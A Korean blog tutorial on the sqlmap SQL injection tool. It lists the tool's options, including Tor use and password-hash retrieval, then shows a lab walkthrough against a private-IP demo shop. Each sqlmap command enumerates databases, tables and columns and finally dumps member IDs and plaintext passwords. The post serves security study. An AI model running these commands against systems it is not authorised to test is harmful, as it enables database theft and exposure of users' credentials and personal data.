일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | ||||||
2 | 3 | 4 | 5 | 6 | 7 | 8 |
9 | 10 | 11 | 12 | 13 | 14 | 15 |
16 | 17 | 18 | 19 | 20 | 21 | 22 |
23 | 24 | 25 | 26 | 27 | 28 |
Tags
- 어셈블리어
- buffer over flow
- HackCTF
- writeup
- webhacking
- Nop Slide
- Hackerschool
- Linux
- SQL Injection
- Python
- ctf
- RITSEC
- ftz
- PWN
- Shadow 동아리
- CodeEngn
- 리버싱
- NewsClipping
- 버퍼오버플로우
- requests
- 뉴스클리핑
- RITSEC CTF 2019
- 웹해킹
- Next.js
- BOF
- 보안뉴스
- 리눅스
- termux
- reversing
- x64dbg
Archives
- Today
- Total
Jaeseo's Information Security Story
SQLMAP - 사용법 본문
SQLMAP - github Link
- sqlmap은 SQL 인젝션 결함 탐지 및 활용, 데이터베이스 서버 장악 프로세스를 자동화 하는 오픈소스 침투 테스팅 도구이다.
대표적 옵션
- -h, --help
도움말 출력 - -u URL, --url=URL
타켓 URL (e.g. "http://www.site.com/vuln.php?id=1") - -g GOOGLEDORK
Google Dork 검색을 통한 타겟 선정 - --data=DATA
POST타입으로 보낼때 데이터 지정 (e.g. "id=1") - --cookie=COOKIE
HTTP Cookie header value 지정 (e.g. "PHPSESSID=a8d127e..") - --random-agent
랜덤한 HTTP User-Agent header value 사용 - --proxy=PROXY
PROXY 사용 - --tor
익명 tor서버 사용 - --check-tor
tor 서버 체크 - -p TESTPARAMETER
테스트 가능한 매개변수 - --level=LEVEL
테스트 쓰레드 속도 설정 (1-5, default 1) - --risk=RISK
리스크 설정 (1-3, default 1) - -a, --all
모든 것을 검색 - -b, --banner
DBMS 배너 확인 - --current-user
DBMS user 확인 - --current-db
DBMS db 확인 - --passwords
DBMS password hash 값 확인 - --dbs
Database 확인 - --tables
DBMS tables 확인 - --columns
DBMS columns 확인 - --schema
DBMS schema 확인 - --dump
DBMS data 조회 - --dump-all
DBMS 내의 모든 data 조회 - -D DB
DB 지정 - -T TBL
TABLE 지정 - -C COL
COLUMN 지정
실습
- 데이터베이스 명 추출(--dbs)
python sqlmap.py -u "http://192.168.0.138:1004/demoshop/shop_board/shop_board_list.asp" --data "page=1&v_num=352" -p v_num --level=3 --dbs
결과
available databases [6]:
[*] master
[*] master2
[*] model
[*] msdb
[*] oyesmall
[*] tempdb
- 데이터베이스 지정 후 테이블명 추출 (-tables)
python sqlmap.py -u "http://192.168.0.138:1004/demoshop/shop_board/shop_board_list.asp" --data "page=1&v_num=352" -p v_num --level=3 -D "oyesmall" --tables
결과
Database: oyesmall
[28 tables]
+-----------------+
| Comment |
| MyBox |
| Statistic |
| Ve_order |
| abracadabra |
| admin_tb |
| banner |
| board |
| category |
| dtproperties |
| goods |
| juke |
| members |
| my_juke |
| notice |
| order_man |
| paper |
| poll |
| poll_tail |
| post2 |
| redmaster_login |
| sell_man |
| seller |
| shop_cart |
| t_jiaozhu |
| tbl_temp |
| visit |
| zipcode_2006_v3 |
+-----------------+
- 데이터베이스 및 테이블명 지정 후 컬럼명 추출 (-columns)
python sqlmap.py -u "http://192.168.0.138:1004/demoshop/shop_board/shop_board_list.asp" --data "page=1&v_num=352" -p v_num --level=3 -D "oyesmall" -T "members" --columns
결과
Database: oyesmall
Table: members
[33 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| address | varchar |
| birth_dd | varchar |
| birth_gbn | varchar |
| birth_mm | varchar |
| birth_yy | varchar |
| editdate | datetime |
| email | varchar |
| hp1 | varchar |
| hp2 | varchar |
| hp3 | varchar |
| ismarry | varchar |
| job | varchar |
| jumin1 | varchar |
| jumin2 | varchar |
| mail_flag | varchar |
| name | varchar |
| num | int |
| passwd | varchar |
| passwd1 | varchar |
| passwd_a | varchar |
| passwd_q | varchar |
| point | varchar |
| postdate | datetime |
| receiveType | varchar |
| tel1_1 | varchar |
| tel1_2 | varchar |
| tel1_3 | varchar |
| tel2_1 | varchar |
| tel2_2 | varchar |
| tel2_3 | varchar |
| user_id | varchar |
| whereTel1 | varchar |
| whereTel2 | varchar |
+-------------+----------+
- 테이터베이스, 테이블, 컬럼명 지정 후 레코드값 추출 (--dump)
python sqlmap.py -u "http://192.168.0.138:1004/demoshop/shop_board/shop_board_list.asp" --data "page=1&v_num=352" -p v_num --level=3 -D "oyesmall" -T "members" -C "user_id,passwd" --dump
결과
Database: oyesmall
Table: members
[10 entries]
+-----------+----------+
| user_id | passwd |
+-----------+----------+
| oyes | 1234 |
| bisang2da | kisec123 |
| kisec | kisec |
| kisectest | kisec |
| rnrneks | 55555 |
| ssam | dlalrud |
| bazzi | 12345 |
| mariz | 12341234 |
| idol | idol |
| whoami | 1q2w3e4r |
+-----------+----------+
'Security Study > Web hacking' 카테고리의 다른 글
Python requests를 이용한 blind injecthion 스크립트 제작 (2편) (2) | 2019.10.23 |
---|---|
Python requests를 이용한 blind injecthion 스크립트 제작 (1편) (2) | 2019.10.23 |
UNION Injection (0) | 2019.10.18 |
SQL Injection 기초 개념 (0) | 2019.10.17 |
Blind Sql Injection 공격 (0) | 2019.10.15 |
Comments